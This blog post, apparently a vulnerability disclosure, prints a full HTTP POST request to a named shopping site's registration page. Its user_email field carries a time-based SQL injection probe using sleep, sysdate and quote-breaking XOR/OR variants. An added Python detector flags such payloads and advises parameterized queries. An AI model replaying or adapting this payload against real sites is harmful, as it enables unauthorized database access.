Vulnerable site: http://www.360shop.com.cn   POST request:

POST /register.php HTTP/1.1
Content-Length: 254
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.360shop.com.cn:80/
Cookie: 360shop_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 360shop_sid=41122db3f1f267c38aa9a68ff9158120; 360shop_validity_time=0; PHPSESSID=l7498dqlinampsn9mga7gdlqi2
Host: www.360shop.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Accept: */*

action=register&code_sn=94102&isagreement=1&password=g00dPa%24%24w0rD&register=1&repassword=g00dPa%24%24w0rD&user_email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

 

The user_email parameter is vulnerable.
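As an added example (not part of the original post), a defender-side check in Python that parses the form body from the request above and reports which fields carry time-based SQL injection probes. The rule set, the email pattern and the function name are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Form body copied from the request above (the page's own probe; sleep(0) adds no delay).
BODY = ("action=register&code_sn=94102&isagreement=1&password=g00dPa%24%24w0rD"
        "&register=1&repassword=g00dPa%24%24w0rD&user_email="
        "if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'"
        "%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/")

# Constructed heuristics (assumptions, not from the page): SQL timing and clock
# functions, comment markers, and a quote directly followed by a boolean operator.
SQLI_RULES = {
    "timing_function": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
    "clock_compare": re.compile(r"\b(now|sysdate)\s*\(\s*\)", re.I),
    "sql_comment": re.compile(r"/\*|\*/|--\s"),
    "quote_operator": re.compile(r"['\"]\s*(xor|or|and)\b", re.I),
}
# Deliberately strict address pattern (assumption); anything else is rejected.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def scan_form_body(body):
    """Return {field: [rule names]} for every form field that trips a rule."""
    findings = {}
    # parse_qsl URL-decodes each value, so %3d / %2c / %22 are matched decoded.
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [rule for rule, rx in SQLI_RULES.items() if rx.search(value)]
        # Allow-list check: user_email must look like an address at all.
        if name == "user_email" and not EMAIL_RE.match(value):
            hits.append("not_an_email")
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for field, rules in scan_form_body(BODY).items():
        print(f"{field}: {', '.join(rules)}")
```

Only user_email is reported; the password fields with `$$` pass cleanly. A filter like this is for detection and logging, and the fix on the server is to validate user_email and bind it as a parameter in the registration query.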

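All articles on this blog are original unless otherwise noted.
When copying or reposting, please credit 起风了 with a hyperlink; original article: 《A POST injection on the 360shop official site – Website Security – Self-study PHP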
   
